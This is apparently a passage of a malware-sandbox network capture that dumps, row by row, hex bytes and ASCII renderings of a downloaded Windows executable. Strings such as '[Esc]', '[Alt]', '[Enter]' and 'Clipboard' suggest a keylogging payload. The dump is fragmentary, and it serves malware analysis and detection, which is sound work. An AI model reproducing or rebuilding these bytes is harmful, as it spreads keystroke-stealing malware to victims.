0a 00 c7 45 f8 0d 00 0a 00 c7 45 c4 43 00 6c 00 c7 45 c8 69 00 70 00 c7 45 cc 62 00 6f 00 c7 45 d0 61 00 72 00 c7 45 d4 Data Ascii: RB\|'\DQ*#&?H8BWvJ_u[_^][_3^]8< e9%%UE<P8=XVuESW<lMWSQ8"UWRS533hfMhDSEEEClEipEboEarE
2021-09-27 18:36:57 UTC	29	IN	Data Raw: e0 06 6a 1c 56 8d bc 08 b8 00 00 00 e8 10 31 01 00 c7 06 1c 00 00 00 c7 46 04 00 00 00 00 8b 57 24 89 56 08 8b 47 20 89 46 0c 8b 4f 2c 89 4e 10 8b 57 34 83 c4 08 89 56 14 8b 47 38 89 46 18 5f b8 01 00 00 00 5e 5d c3 75 cb 26 2c 47 21 01 48 2e 55 8b ec 8b 55 0c 85 d2 74 1f 8b 45 08 85 c0 74 18 8b 08 52 51 c7 40 08 00 00 00 00 89 48 0c e8 ac fe ff ff 83 c4 08 5d c3 33 c0 5d c3 fe f6 03 55 8b ec 8b 55 0c 85 d2 74 29 8b 45 08 85 c0 74 22 8b 48 0c 8b 09 85 c9 74 19 01 48 0c c7 40 08 00 00 00 00 8b 40 0c 52 50 e8 72 fe ff ff 83 c4 08 5d c3 33 c0 5d c3 6f 21 1c 28 7c c5 0f f2 76 55 8b ec 56 8b 75 0c 85 f6 74 28 8b 4d 08 85 c9 74 21 8b 51 0c 8b 41 08 3b 42 04 73 16 57 50 8d 78 01 56 52 89 79 08 e8 04 ff ff ff 83 c4 0c 5f 5e 5d c3 33 c0 5e 5d c3 18 96 1e f0 ee 83 Data Ascii: jV1FW$VG FO,NW4VG8F_^]u&,G!H.UUtEtRQ@H]3]UUt)Et"HtH@@RPr]3]o!(\|vUVut(Mt!QA;BsWPxVRy_^]3^]
2021-09-27 18:36:57 UTC	30	IN	Data Raw: 7e d7 71 64 38 e7 c8 09 55 8b ec 83 ec 58 53 56 57 6a 34 8d 45 ac 6a 00 50 e8 fa 2b 01 00 8b 45 0c 8b 48 10 8b 5d 08 6a 06 8d 55 a8 52 50 53 89 4d a8 e8 91 05 01 00 83 c4 1c 83 7d b8 00 0f 84 7e 01 00 00 8b 75 14 8b 4d 1c 8d 86 f8 02 00 00 50 51 e8 11 fb ff ff 83 c4 08 83 7d d8 00 0f 84 5e 01 00 00 83 7d d4 00 0f 84 54 01 00 00 8b 45 dc 85 c0 0f 84 49 01 00 00 83 7d c8 00 0f 84 3f 01 00 00 8b 96 d8 02 00 00 89 10 8b 86 d4 02 00 00 8b 4d c8 8b 55 18 89 01 8b 42 08 8b 4d d8 89 01 8b 96 00 03 00 00 8b 45 d4 89 10 81 86 d4 02 00 00 00 80 02 00 e8 dd 23 01 00 8b be d8 02 00 00 b9 00 f0 ff ff 2b c8 01 8e d4 02 00 00 6a 71 53 81 c7 00 02 05 00 e8 1c 14 00 00 50 6a 00 e8 74 20 01 00 89 45 f8 8b 86 d8 02 00 00 83 c4 10 05 00 04 05 00 68 22 02 00 00 89 45 fc e8 36 Data Ascii: ~qd8UXSVWj4EjP+EH]jURPSM}~uMPQ}^}TEI}?MUBME#+jqSPjt Eh"E6
2021-09-27 18:36:57 UTC	31	IN	Data Raw: 50 56 e8 03 e5 ff ff 83 c4 08 85 db 75 1b 8d 8d 90 f9 ff ff 51 8d 55 ec 52 e8 bc f6 ff ff 83 c4 08 85 c0 0f 85 a1 fd ff ff 8d 45 ec 50 56 e8 27 f7 ff ff 83 c4 08 5f 5e 8b c3 5b 8b e5 5d c3 e2 ef 4d 90 e6 f7 3a ff 34 79 ab 55 8b ec 53 8b 5d 10 56 8b 75 14 57 8b 7d 08 6a 1d 56 53 57 e8 27 fd ff ff 83 c4 10 85 c0 75 20 6a 1d 56 53 57 e8 16 fd ff ff 83 c4 10 85 c0 75 0f 56 50 8b 45 0c 50 57 e8 63 5a 00 00 83 c4 10 5f 5e 5b 5d c3 03 61 88 fb dc ba 0d fe 5e d8 0d 55 8b ec 83 ec 0c 8b 4d 08 53 56 57 8b 7d 0c 8b 87 40 02 00 00 6a 04 68 00 30 00 00 50 6a 00 51 e8 eb 25 01 00 8b 5d 10 89 03 8b 97 40 02 00 00 8b 4f 10 52 51 50 e8 75 26 01 00 8b 03 03 07 8b 33 89 43 04 40 83 c4 20 89 43 08 89 75 fc e8 48 3e 01 00 8b 55 08 8b ce 2b 4a 04 8d 44 08 03 89 43 0c 8b 8f 40 Data Ascii: PVuQUREPV'_^[]M:4yUS]VuW}jVSW'u jVSWuVPEPWcZ_^[]a^UMSVW}@jh0PjQ%]@ORQPu&3C@ CuH>U+JDC@
2021-09-27 18:36:57 UTC	33	IN	Data Raw: 04 7b 47 83 c4 04 83 ff 40 72 e7 eb 12 6a 00 8d 8d f8 fd ff ff 51 56 e8 95 1d 00 00 83 c4 0c 6a 01 56 e8 6a 52 00 00 83 c4 08 85 c0 0f 85 d6 00 00 00 68 00 10 00 00 56 e8 64 23 01 00 68 00 10 00 00 56 89 86 58 0b 00 00 e8 53 23 01 00 68 00 10 00 00 56 89 86 5c 0b 00 00 e8 42 23 01 00 8d be 2c 0a 00 00 57 56 89 86 90 0b 00 00 e8 7f 2f 00 00 6a 00 6a 01 57 56 89 86 20 0a 00 00 e8 ee ba 00 00 6a 00 6a 15 57 56 89 86 94 0b 00 00 e8 dd ba 00 00 83 c4 40 83 be 20 0a 00 00 00 89 86 98 0b 00 00 75 1a 57 56 e8 b4 3a 00 00 57 56 e8 8d 30 00 00 83 c4 10 83 be 20 0a 00 00 00 74 3f 6a 00 6a 16 57 56 e8 a6 ba 00 00 83 c4 10 83 be 20 0a 00 00 00 89 86 28 0a 00 00 74 22 8b 86 58 0b 00 00 85 c0 74 18 83 be f0 09 00 00 00 74 0f 66 83 38 00 75 09 56 e8 05 3b 00 00 83 c4 04 Data Ascii: {G@rjQVjVjRhVd#hVXS#hV\B#,WV/jjWV jjWV@ uWV:WV0 t?jjWV (t"Xttf8uV;
2021-09-27 18:36:57 UTC	34	IN	Data Raw: 85 c0 75 46 8d 85 e4 fd ff ff 50 6a 0a 6a 77 6a 6f 56 e8 41 b9 00 00 83 c4 08 50 e8 68 27 01 00 83 c4 10 85 c0 75 23 8d 8d e4 fd ff ff 51 6a 0a 6a 78 6a 70 56 e8 1e b9 00 00 83 c4 08 50 e8 45 27 01 00 83 c4 10 85 c0 74 0d 8b 56 04 31 96 98 04 00 00 b3 01 eb 07 83 86 68 04 00 00 f7 00 5e 2d 8a 46 2d fe c0 00 46 2e 5e b8 01 00 00 00 5b 8b e5 5d c3 1c a3 39 26 55 8b ec 53 56 57 6a 00 32 db e8 e1 13 01 00 8b 75 08 8b f8 83 c4 04 83 7f 18 00 0f 84 fb 00 00 00 8b 47 28 50 6a 08 6a 5c 6a 63 56 e8 af b8 00 00 83 c4 08 50 e8 d6 26 01 00 83 c4 10 85 c0 0f 85 f3 00 00 00 8b 4f 28 51 6a 0c 6a 5c 6a 64 56 e8 8b b8 00 00 83 c4 08 50 e8 b2 26 01 00 83 c4 10 85 c0 0f 85 cf 00 00 00 8b 57 28 52 6a 08 6a 5c 6a 65 56 e8 67 b8 00 00 83 c4 08 50 e8 8e 26 01 00 83 c4 10 85 c0 Data Ascii: uFPjjwjoVAPh'u#QjjxjpVPE'tV1h^-F-F.^[]9&USVWj2uG(Pjj\jcVP&O(Qjj\jdVP&W(Rjj\jeVgP&
2021-09-27 18:36:57 UTC	35	IN	Data Raw: e8 4a e7 ff ff 83 c4 08 5f 84 db 75 14 0f 31 33 c9 03 c8 0f 31 2b c1 89 45 fc 83 86 5c 05 00 00 ba 00 5e 31 8a 46 31 fe c0 00 46 32 5e b8 01 00 00 00 5b 8b e5 5d c3 2a 05 12 be 33 98 87 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 68 bb 00 00 00 50 e8 9f b3 00 00 50 e8 29 11 01 00 83 c4 0c 5d c3 52 19 ac ed 55 8b ec 8b 55 0c 8b 45 08 6b d2 0d 8d 48 28 51 8d 4c 02 44 51 83 c0 1c 50 e8 02 0e 01 00 83 c4 0c 5d c3 27 b6 c5 14 a6 a0 11 52 bf 19 97 29 3e 55 8b ec 8b 45 0c 8b 4d 08 50 51 e8 50 b3 00 00 50 e8 aa 0e 01 00 83 c4 0c 5d c3 cf 23 c5 f0 68 55 8b ec 53 56 8b 75 08 57 8d 7e 28 8d 46 44 57 50 8d 5e 1c 53 e8 b6 0d 01 00 89 86 a0 0b 00 00 57 8d 46 44 50 53 e8 a5 0d 01 00 8b 4e 04 57 8d 56 51 52 33 c8 53 89 8e 14 0a 00 00 e8 8f 0d 01 Data Ascii: J_u131+E\^1F1F2^[]*3UEhPP)]RUUEkH(QLDQP]'R)>UEMPQPP]#hUSVuW~(FDWP^SWFDPSNWVQR3S
2021-09-27 18:36:57 UTC	37	IN	Data Raw: f8 c1 c6 05 8b d1 33 d0 33 d3 03 f2 03 b4 bd b8 fe ff ff 8b 55 f4 8d 94 16 a1 eb d9 6e c1 cb 02 8b f0 33 c3 89 4d f4 8b 4d f8 33 c1 89 55 f8 c1 c2 05 03 d0 03 94 bd bc fe ff ff 8b 45 f4 c1 c9 02 8d 84 02 a1 eb d9 6e 8b 55 f8 89 5d fc 89 4d fc 89 45 f8 c1 c0 05 8b cb 33 4d fc 83 c7 05 33 ca 03 c1 03 84 bd ac fe ff ff 8b 4d f8 c1 ca 02 8d b4 30 a1 eb d9 6e 8b 45 fc 89 55 fc 89 75 f8 8b d0 33 55 fc c1 c6 05 33 d1 03 f2 03 b4 bd b0 fe ff ff 8b 55 fc 8d b4 1e a1 eb d9 6e 89 45 f4 8b 45 f8 c1 c9 02 89 75 f8 83 ff 28 0f 8c 27 ff ff ff c7 45 fc 28 00 00 00 c1 c6 05 03 75 f4 89 55 f4 8b f9 0b f8 23 fa 8b d9 23 d8 0b fb 8b 5d fc 03 bc 9d b4 fe ff ff c1 c8 02 8d b4 37 dc bc 1b 8f 8b 7d f8 89 75 f8 c1 c6 05 03 75 f4 8b d0 0b d7 23 d1 8b d8 23 df 0b d3 8b 5d fc 03 94 Data Ascii: 33Un3MM3UEnU]ME3M3M0nEUu3U3UnEEu('E(uU##]7}uu##]
2021-09-27 18:36:57 UTC	38	IN	Data Raw: e1 0f 0f b6 54 8d c0 88 50 02 83 c0 03 c6 00 3d 40 c6 00 00 2b 45 08 5f 5e 40 5b 8b e5 5d c3 ce 3a ce 3f 55 06 8a e5 0e 16 e4 77 b5 4c 55 8b ec 81 ec 00 01 00 00 8b 4d 0c 56 c7 85 00 ff ff ff 40 40 40 40 c7 85 04 ff ff ff 40 40 40 40 c7 85 08 ff ff ff 40 40 40 40 c7 85 0c ff ff ff 40 40 40 40 c7 85 10 ff ff ff 40 40 40 40 c7 85 14 ff ff ff 40 40 40 40 c7 85 18 ff ff ff 40 40 40 40 c7 85 1c ff ff ff 40 40 40 40 c7 85 20 ff ff ff 40 40 40 40 c7 85 24 ff ff ff 40 40 40 40 c7 85 28 ff ff ff 40 40 40 3e b2 3f c7 85 2c ff ff ff 40 40 40 3f c7 85 30 ff ff ff 34 35 36 37 c7 85 34 ff ff ff 38 39 3a 3b c7 85 38 ff ff ff 3c 3d 40 40 c7 85 3c ff ff ff 40 40 40 40 c7 85 40 ff ff ff 40 00 01 02 c7 85 44 ff ff ff 03 04 05 06 c7 85 48 ff ff ff 07 08 09 0a c7 85 4c ff ff Data Ascii: TP=@+E_^@[]:?UwLUMV@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@$@@@@(@@@>?,@@@?04567489:;8<=@@<@@@@@@DHL
2021-09-27 18:36:57 UTC	39	IN	Data Raw: 05 33 c0 5e 5d c3 83 7e 60 00 75 10 56 e8 22 f8 ff ff 83 c4 04 c7 46 60 01 00 00 00 b8 01 00 00 00 5e 5d c3 55 8b ec 83 7d 10 00 74 59 56 8b 75 08 83 7e 60 00 75 51 83 7e 64 00 75 4b 53 57 8b 7d 0c bb 01 00 00 00 29 5d 10 83 7e 64 00 75 33 8b 46 5c 8a 0f 88 4c 30 1c 01 5e 5c 83 46 14 08 8b 46 5c 75 08 01 5e 18 75 03 89 5e 64 83 f8 40 75 09 56 e8 6c f2 ff ff 83 c4 04 03 fb 83 7d 10 00 75 c4 5f 5b 5e 5d c3 c7 46 64 01 00 00 00 5e 5d c3 cc cc 55 8b ec 5d e9 27 fe ff ff 62 74 5a 84 e6 d3 c0 55 8b ec 56 8b 75 0c 57 8b 7d 08 83 fe 01 76 29 8d 44 37 fe 8d 4e ff 8a 50 01 28 10 48 49 75 f7 83 fe 01 76 14 8b c7 8d 4e ff 8d 9b 00 00 00 00 8a 50 01 28 10 40 49 75 f7 8b 45 10 50 56 57 e8 dc fd ff ff 83 c4 0c 83 fe 01 76 23 8d 44 37 fe 8d 4e ff 8a 50 01 28 10 48 49 75 Data Ascii: 3^]~`uV"F`^]U}tYVu~`uQ~duKSW})]~du3F\L0^\FF\u^u^d@uVl}u_[^]Fd^]U]'btZUVuW}v)D7NP(HIuvNP(@IuEPVWv#D7NP(HIu
2021-09-27 18:36:57 UTC	41	IN	Data Raw: ff ff 85 c9 74 0f eb 03 8d 49 00 49 0f b6 10 8d 44 10 01 75 f6 0f b6 10 53 8b 5d 08 56 57 8d 8b b8 07 00 00 51 8d 70 01 52 56 e8 1c fb ff ff 8b 7d 14 83 c4 0c 56 83 ff 04 75 1b e8 6b 04 01 00 40 50 8b 45 0c 56 50 e8 8f 01 01 00 83 c4 10 5f 5e 5b 8b e5 5d c3 8d 8d e8 fd ff ff 51 e8 69 08 01 00 83 c4 08 85 ff 0f 85 80 00 00 00 33 d2 68 06 02 00 00 52 8d 85 e2 fb ff ff 50 66 89 95 e0 fb ff ff e8 d3 01 01 00 68 04 01 00 00 8d 8d e8 fd ff ff 51 8d 55 f0 52 e8 4e 10 01 00 68 04 01 00 00 8d 85 e0 fb ff ff 50 8d 4d f8 51 e8 39 10 01 00 8d 55 f8 52 8d 45 f0 50 57 53 e8 5a df 00 00 83 c4 34 85 c0 78 49 8b 4d fc 51 e8 fa 03 01 00 8b 4d 0c 8d 54 00 02 8b 45 fc 52 50 51 e8 f8 00 01 00 83 c4 10 5f 5e 5b 8b e5 5d c3 8d 95 e8 fd ff ff 52 e8 d2 03 01 00 8b 55 0c 8d 44 00 Data Ascii: tIIDuS]VWQpRV}Vuk@PEVP_^[]Qi3hRPfhQURNhPMQ9UREPWSZ4xIMQMTERPQ_^[]RUD
2021-09-27 18:36:57 UTC	42	IN	Data Raw: 0c 83 ec 10 8b c4 89 38 8b 7d c8 89 78 04 89 48 08 8b 4d d0 52 8b 56 24 89 48 0c ff d2 39 5d fc 0f 84 82 00 00 00 8b 55 f8 8b 4d 10 8b 32 b8 08 00 00 00 66 89 45 c4 8b 7d c4 8d 45 f4 50 83 ec 10 8b c4 89 38 8b 7d c8 89 78 04 89 48 08 8b 4d d0 52 8b 56 24 89 48 0c ff d2 8b 45 fc 8b 08 39 5d f4 74 3e 8d 55 ec 52 50 8b 41 2c ff d0 8b 45 ec 3b c3 74 1d 8b 08 8d 55 e4 52 50 8b 41 1c ff d0 83 7d e4 01 7d 35 8b 45 ec 8b 08 8b 51 08 50 ff d2 8b 45 f4 8b 08 8b 51 08 50 ff d2 8b 45 fc 8b 08 8b 51 08 50 ff d2 8b 45 f8 8b 08 8b 51 08 50 ff d2 33 c0 5f 5e 5b 8b e5 5d c3 33 c0 8d 4d e8 51 89 45 d8 8b 45 ec 8d 4d d4 c7 45 d4 00 04 02 00 c7 45 dc c0 00 00 00 c7 45 e0 00 00 00 46 8b 10 8b 12 51 50 ff d2 8b 4d e8 b8 09 00 00 00 66 89 85 6c ff ff ff 8b 45 f4 8b 30 83 ec 10 Data Ascii: 8}xHMRV$H9]UM2fE}EP8}xHMRV$HE9]t>URPA,E;tURPA}}5EQPEQPEQPEQP3_^[]3MQEEMEEEFQPMflE0
2021-09-27 18:36:57 UTC	43	IN	Data Raw: 00 6a 01 8d 55 f0 52 8b 11 6a 00 6a 00 6a 00 8d 45 f8 50 8b 45 f4 52 50 53 e8 cb d8 00 00 83 c4 2c 85 c0 79 23 8b 4d fc 8b 13 51 52 53 e8 07 d9 00 00 8b 45 f4 50 53 e8 2d dd 00 00 83 c4 14 5f 5e 33 c0 5b 8b e5 5d c3 8b 45 fc 33 ff 8b d8 85 f6 74 1a 8d 9b 00 00 00 00 50 e8 da fc 00 00 88 04 1f 47 83 c4 04 3b fe 72 ef 8b 45 fc 8b 7d 10 8b 8f 40 02 00 00 8b 55 14 01 75 f8 51 03 c6 52 50 89 45 fc e8 a0 f6 00 00 83 c4 0c 83 7d 18 06 75 20 8b 45 f4 8b 4d 08 50 51 e8 ca dc 00 00 8b 55 f8 8b 45 fc 83 c4 08 89 57 1c 5f 5e 5b 8b e5 5d c3 8b 45 fc 2b c6 8b 75 08 8b 0e 50 51 56 e8 75 d8 00 00 8b 55 f4 52 56 e8 9b dc 00 00 8b 07 83 c4 14 03 45 f8 5f 5e 5b 8b e5 5d c3 12 20 e6 f0 30 07 b0 5c cf c1 fe 37 55 8b ec 83 ec 08 8b 55 10 6a 04 6a 00 6a 01 8d 45 f8 50 8b 02 6a Data Ascii: jURjjjEPERPS,y#MQRSEPS-_^3[]E3tPG;rE}@UuQRPE}u EMPQUEW_^[]E+uPQVuURVE_^[] 0\7UUjjjEPj
2021-09-27 18:36:57 UTC	45	IN	Data Raw: 66 89 85 78 fc ff ff e8 44 f2 00 00 6a 7e 8d 95 82 fe ff ff 6a 00 52 e8 34 f2 00 00 6a 7e 8d 85 02 ff ff ff 6a 00 50 e8 24 f2 00 00 b9 5c 00 00 00 33 c0 8b d1 6a 7e 66 89 8d 80 fe ff ff 50 8d 4d 82 51 66 89 95 00 ff ff ff 66 89 45 80 e8 fd f1 00 00 6a 05 6a 05 8d 55 80 52 56 e8 2f ef ff ff 83 c4 40 8d 85 78 fc ff ff 50 8d 4d 80 51 56 e8 eb ed ff ff 8d 55 80 52 e8 42 f4 00 00 8b 7d 0c 03 c0 50 8d 85 78 fc ff ff 57 50 e8 4f f4 00 00 83 c4 1c 85 c0 74 0b 5f b8 01 00 00 00 5e 8b e5 5d c3 6a 00 6a 03 8d 8d 78 fc ff ff 51 56 e8 dc ee ff ff 8d 95 82 fe ff ff 57 52 e8 3f f6 00 00 8d 85 02 ff ff ff 57 50 e8 82 86 ff ff 6a 00 8d 8d 00 ff ff ff 51 8d 95 78 fc ff ff 52 e8 4d f5 00 00 6a 00 8d 85 80 fe ff ff 50 8d 8d 78 fc ff ff 51 e8 38 f5 00 00 6a 00 6a 15 8d 95 78 Data Ascii: fxDj~jR4j~jP$\3j~fPMQffEjjURV/@xPMQVURB}PxWPOt_^]jjxQVWR?WPjQxRMjPxQ8jjx
2021-09-27 18:36:57 UTC	46	IN	Data Raw: 00 6a 00 6a 00 8d 45 e8 50 8b 45 08 8d 55 e0 89 55 f0 8b 55 0c 51 52 50 c7 45 e8 18 00 00 00 c7 45 ec 00 00 00 00 c7 45 f4 40 00 00 00 c7 45 f8 00 00 00 00 c7 45 fc 00 00 00 00 e8 77 ce 00 00 33 c9 83 c4 48 85 c0 0f 99 c1 5e 8b c1 8b e5 5d c3 3a 07 93 4b 7b 90 55 8b ec 81 ec 08 02 00 00 33 c0 68 fe 01 00 00 50 8d 8d fa fd ff ff 51 66 89 85 f8 fd ff ff e8 7c ec 00 00 8b 45 10 83 c4 0c 85 c0 74 14 68 00 01 00 00 50 8d 55 f8 52 e8 f3 fa 00 00 83 c4 0c eb 44 6a 0c 6a 05 e8 a5 dd ff ff 0f b6 c0 83 c4 08 50 8d 8d f8 fd ff ff 51 e8 b2 ee 00 00 8d 94 45 f8 fd ff ff 83 c4 04 52 e8 52 fc 00 00 68 00 01 00 00 8d 85 f8 fd ff ff 50 8d 4d f8 51 e8 ad fa 00 00 83 c4 14 56 8b 75 14 56 e8 80 ee 00 00 03 c0 50 8b 45 0c 8b 08 56 6a 01 6a 00 8d 55 f8 52 8b 55 08 51 52 e8 05 Data Ascii: jjEPEUUUQRPEEE@EEw3H^]:K{U3hPQf\|EthPURDjjPQERRhPMQVuVPEVjjURUQR
2021-09-27 18:36:57 UTC	47	IN	Data Raw: 8d 00 fc ff ff 6a 0a 51 e8 01 ea 00 00 83 c4 04 8d 94 45 ee fb ff ff 52 56 e8 c0 e4 ff ff 83 c4 10 68 1f 02 02 00 8d 85 00 fc ff ff 50 8d 4d 08 51 56 e8 17 fa ff ff 8b 55 0c 52 6a 00 8d 45 08 50 56 e8 b7 fa ff ff 83 c4 20 83 be 58 0b 00 00 00 74 25 8d 8d 00 fc ff ff 51 e8 af e9 00 00 03 c0 50 8b 86 58 0b 00 00 8d 95 00 fc ff ff 52 50 e8 a9 e6 00 00 83 c4 10 8b 4d 08 51 56 e8 dc cc 00 00 83 c4 08 5e 8b e5 5d c3 ae 50 cb 6c 55 8b ec 81 ec 10 04 00 00 56 57 33 c0 68 0e 04 00 00 50 8d 8d f2 fb ff ff 51 66 89 85 f0 fb ff ff e8 ea e6 00 00 8b 75 08 6a 01 6a 09 8d 95 f0 fb ff ff 52 56 e8 16 e4 ff ff 8b 7d 0c 57 e8 3d e9 00 00 83 c4 20 03 c0 50 8d 85 f0 fb ff ff 57 50 e8 2a e9 00 00 8d 8c 45 f0 fb ff ff 83 c4 04 51 e8 2a e6 00 00 8d 95 f0 fb ff ff 52 e8 0e e9 00 Data Ascii: jQERVhPMQVURjEPV Xt%QPXRPMQV^]PlUVW3hPQfujjRV}W= PWPEQR
2021-09-27 18:36:57 UTC	49	IN	Data Raw: 00 50 8b 86 a4 0c 00 00 6a 00 6a 00 50 57 e8 32 7f 00 00 6a 44 56 89 86 b4 0c 00 00 e8 64 7e 00 00 8b 8e a4 0c 00 00 83 c4 40 50 6a 00 6a 00 51 57 e8 0f 7f 00 00 83 c4 14 83 be b0 0c 00 00 00 89 86 bc 0c 00 00 0f 84 03 02 00 00 83 be b4 0c 00 00 00 0f 84 f6 01 00 00 85 c0 0f 84 ee 01 00 00 53 6a 0c 8d 55 dc 52 8d 86 68 4c 00 00 50 c7 45 dc 5b 00 45 00 c7 45 e0 73 00 63 00 c7 45 e4 5d 00 00 00 e8 3c e1 00 00 6a 0c 8d 4d f4 51 8d 96 80 4c 00 00 52 c7 45 f4 5b 00 41 00 c7 45 f8 6c 00 74 00 c7 45 fc 5d 00 00 00 e8 15 e1 00 00 6a 0c 8d 45 e8 50 8d 8e 98 4c 00 00 51 c7 45 e8 5b 00 54 00 c7 45 ec 61 00 62 00 c7 45 f0 5d 00 00 00 e8 ee e0 00 00 6a 10 8d 4d bc 51 8d 96 b0 4c 00 00 52 c7 45 bc 5b 00 45 00 c7 45 c0 6e 00 74 00 c7 45 c4 65 00 72 00 c7 45 c8 5d 00 00 Data Ascii: PjjPW2jDVd~@PjjQWSjURhLPE[EEscE]<jMQLRE[AEltE]jEPLQE[TEabE]jMQLRE[EEntEerE]
2021-09-27 18:36:57 UTC	50	IN	Data Raw: 00 52 8d 8c 46 e8 3f 00 00 51 bf 01 00 00 00 e8 58 dc 00 00 83 86 c0 3e 00 00 02 6a 02 56 e8 d9 fc ff ff 83 c4 14 8b c7 5f 5e 5d c3 83 f8 0d 75 15 8b 75 08 6a 10 8d 86 b0 4c 00 00 50 8d 8e e8 3f 00 00 51 eb 9b 83 f8 09 75 24 8b 75 08 6a 0c 8d 96 98 4c 00 00 52 8d 86 e8 3f 00 00 50 e8 09 dc 00 00 c7 86 c0 3e 00 00 05 00 00 00 eb 81 83 f8 1b 75 27 8b 75 08 6a 0c 8d 8e 68 4c 00 00 51 8d 96 e8 3f 00 00 52 e8 e0 db 00 00 c7 86 c0 3e 00 00 05 00 00 00 e9 55 ff ff ff 83 f8 12 75 27 8b 75 08 6a 0c 8d 86 80 4c 00 00 50 8d 8e e8 3f 00 00 51 e8 b4 db 00 00 c7 86 c0 3e 00 00 05 00 00 00 e9 29 ff ff ff 83 c0 90 83 f8 17 0f 87 53 ff ff ff 5f b8 01 00 00 00 5e 5d c3 55 8b ec 8b 45 0c 53 8b 58 08 56 8b 75 08 57 0f bf 78 0e 8b 86 b4 0c 00 00 6a 14 81 e7 ff 00 00 00 ff d0 Data Ascii: RF?QX>jV_^]uujLP?Qu$ujLR?P>u'ujhLQ?R>Uu'ujLP?Q>)S_^]UESXVuWxj
2021-09-27 18:36:57 UTC	52	IN	Data Raw: 00 6a 00 50 57 e8 89 74 00 00 83 c4 1c 89 86 bc 0c 00 00 85 c0 74 33 8b 8e a0 0b 00 00 68 4f 08 75 b9 6a 00 6a 00 51 57 e8 66 74 00 00 8b f8 83 c4 14 85 ff 74 14 6a 00 6a 00 56 e8 6b 0b 01 00 83 c0 02 50 6a 00 6a 00 ff d7 5f b8 01 00 00 00 5e 8b e5 5d c3 5f 33 c0 5e 8b e5 5d c3 e9 ad 64 e7 5b 38 55 8b ec 81 ec 08 02 00 00 56 8b 75 08 57 8b be d8 07 00 00 85 ff 0f 84 29 01 00 00 83 bf a4 a9 00 00 00 0f 84 1c 01 00 00 8b 86 28 0a 00 00 53 50 56 e8 b9 bc 00 00 33 c9 68 06 02 00 00 51 8d 95 fa fd ff ff 52 c7 86 28 0a 00 00 00 00 00 00 66 89 8d f8 fd ff ff e8 d4 d6 00 00 8b 86 58 0b 00 00 6a 01 50 8d 4d 08 51 56 e8 e1 ea ff ff 6a 00 6a 03 8d 95 f8 fd ff ff 52 56 e8 f0 d3 ff ff 8d 85 f8 fd ff ff 50 e8 14 d9 00 00 b9 5c 00 00 00 6a 00 8d 97 ec ac 00 00 66 89 8c Data Ascii: jPWtt3hOujjQWfttjjVkPjj_^]_3^]d[8UVuW)(SPV3hQR(fXjPMQVjjRVP\jf
2021-09-27 18:36:57 UTC	53	IN	Data Raw: 56 e8 c4 fc ff ff 83 c4 04 83 7d 0c 00 75 35 56 e8 f5 fa ff ff 83 c4 04 83 be 28 0a 00 00 00 75 1a 6a 00 6a 16 8d 96 2c 0a 00 00 52 56 e8 08 6b 00 00 83 c4 10 89 86 28 0a 00 00 56 e8 f9 73 ff ff 83 c4 04 5e 5d c3 00 fa 6d b8 01 00 00 00 c3 1f 56 79 ad 69 9d 79 6b 36 63 55 8b ec 83 ec 54 56 33 c0 6a 3e 50 8d 4d ae 51 66 89 45 ac e8 c7 d1 00 00 8b 55 0c 8b 75 08 6a 01 52 8d 45 ac 50 56 e8 f4 ce ff ff 8b 16 8d 4d fc 51 6a 28 52 56 e8 b5 b4 00 00 83 c4 2c 85 c0 78 4b 8d 45 f0 50 8d 4d ac 51 6a 00 56 e8 8e ba 00 00 83 c4 10 85 c0 74 27 8b 45 fc 6a 00 6a 00 6a 00 8d 55 ec 52 6a 00 50 56 c7 45 ec 01 00 00 00 c7 45 f8 02 00 00 00 e8 f3 b4 00 00 83 c4 1c 8b 4d fc 51 56 e8 16 b7 00 00 83 c4 08 5e 8b e5 5d c3 e2 3f cc a5 4d ac b7 91 bd ff 1a 90 89 7a 55 8b ec 83 ec Data Ascii: V}u5V(ujj,RVk(Vs^]mVyiyk6cUTV3j>PMQfEUujREPVMQj(RV,xKEPMQjVt'EjjjURjPVEEMQV^]?MzU
2021-09-27 18:36:57 UTC	54	IN	Data Raw: 9a 55 8b ec 81 ec 10 02 00 00 57 33 c0 68 06 02 00 00 50 8d 8d f2 fd ff ff 51 66 89 85 f0 fd ff ff e8 bb cc 00 00 8b 7d 08 6a 71 57 e8 90 b5 ff ff 50 6a 00 e8 e8 c1 00 00 8b 40 28 8d 95 f0 fd ff ff 52 50 57 e8 67 9c ff ff 83 c4 28 66 83 bd f0 fd ff ff 00 75 07 33 c0 5f 8b e5 5d c3 8d 8d f0 fd ff ff 53 51 c7 45 fc 00 00 00 00 e8 df ce 00 00 8b 5d 10 83 c4 04 8d 94 45 f0 fd ff ff 89 55 f8 56 ff 45 fc 8a c3 80 fb 03 72 05 80 fb 29 76 0c 6a 29 6a 03 e8 96 bd ff ff 83 c4 08 8b 4d f8 0f b6 d0 51 52 57 e8 35 d7 00 00 8b 75 0c 83 c4 0c 85 f6 74 21 8d 85 f0 fd ff ff 50 e8 8f ce 00 00 8d 4c 00 02 51 8d 95 f0 fd ff ff 52 56 e8 8d cb 00 00 83 c4 10 85 db 75 6d 39 5d 14 74 74 53 6a 02 8d 85 f0 fd ff ff 50 57 e8 f1 64 00 00 8b f0 83 c4 10 85 f6 74 39 8b 45 14 8d 48 14 Data Ascii: UW3hPQf}jqWPj@(RPWg(fu3_]SQE]EUVEr)vj)jMQRW5ut!PLQRVum9]ttSjPWdt9EH
2021-09-27 18:36:57 UTC	58	IN	Data Raw: c6 89 45 ca 89 45 ce 66 89 45 d2 75 1f 6a 04 6a 16 8d 55 d4 52 53 e8 f1 b8 ff ff 6a 04 6a 17 8d 45 b4 50 53 e8 e3 b8 ff ff 83 c4 20 33 c0 6a 04 6a 18 8d 8d 70 ff ff ff 51 53 c6 85 70 ff ff ff 00 89 85 71 ff ff ff 89 85 75 ff ff ff 89 85 79 ff ff ff 89 85 7d ff ff ff 89 45 81 89 45 85 89 45 89 66 89 45 8d 88 45 8f e8 9e b8 ff ff 33 c0 6a 04 6a 19 8d 55 90 52 53 c6 45 90 00 89 45 91 89 45 95 89 45 99 89 45 9d 89 45 a1 89 45 a5 89 45 a9 66 89 45 ad 88 45 af e8 6e b8 ff ff 6a 00 6a 01 56 53 e8 b3 54 00 00 83 c4 30 89 45 b0 85 c0 0f 84 7c 01 00 00 8d 4d d4 51 50 e8 9b be 00 00 8b d8 83 c4 08 85 db 0f 84 55 01 00 00 8d 55 d4 52 e8 d5 bd 00 00 8d 4d b4 8d 44 03 03 51 50 